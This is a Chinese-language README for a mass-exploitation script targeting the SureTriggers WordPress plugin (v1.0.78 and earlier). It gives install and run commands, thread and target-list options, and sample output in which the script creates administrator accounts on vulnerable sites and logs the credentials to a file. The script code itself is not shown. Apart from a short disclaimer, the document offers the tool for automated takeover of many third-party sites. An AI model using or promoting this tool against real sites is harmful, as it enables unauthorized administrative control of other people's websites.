🛠️ SureTriggers 漏洞利用脚本 此脚本用于识别和利用 WordPress 站点中运行存在漏洞版本(≤ v1.0.78)的 SureTriggers 插件中的安全漏洞。如果成功,脚本将自动创建一个 WordPress 管理员账户。
⚙️ 功能特性
🚀 使用方法 📦 准备工作 安装依赖(如果尚未安装):
pip install requests
准备一个包含目标 URL 列表的文件(每行一个),例如 targets.txt:
http://example1.com
https://example2.net
...
🧪 执行
python exploit.py -l targets.txt -t 10
🔧 CLI 选项
| 选项 | 描述 |
|---|---|
-l, --target_urls | 包含目标列表的文本文件 |
-t, --threads | 线程数(默认:5) |
✅ 输出示例
[+] http://example.com - Vulnerable v1.0.75 detected.
[+] http://example.com - Exploit successful! username:password
[+] http://example.com/wp-login.php | username:password (saved)
📝 注意事项 仅当以下条件满足时才会对目标进行利用:
wp-login.php 页面有效vulnerable.txt 文件将包含成功创建的账户,格式如下:
http://target.com/wp-login.php | username:password
⚠️ 免责声明 此脚本仅供教育目的和合法安全测试使用。严禁将其用于违法活动或未经系统所有者授权的行为。作者不对该脚本的滥用行为承担任何责任。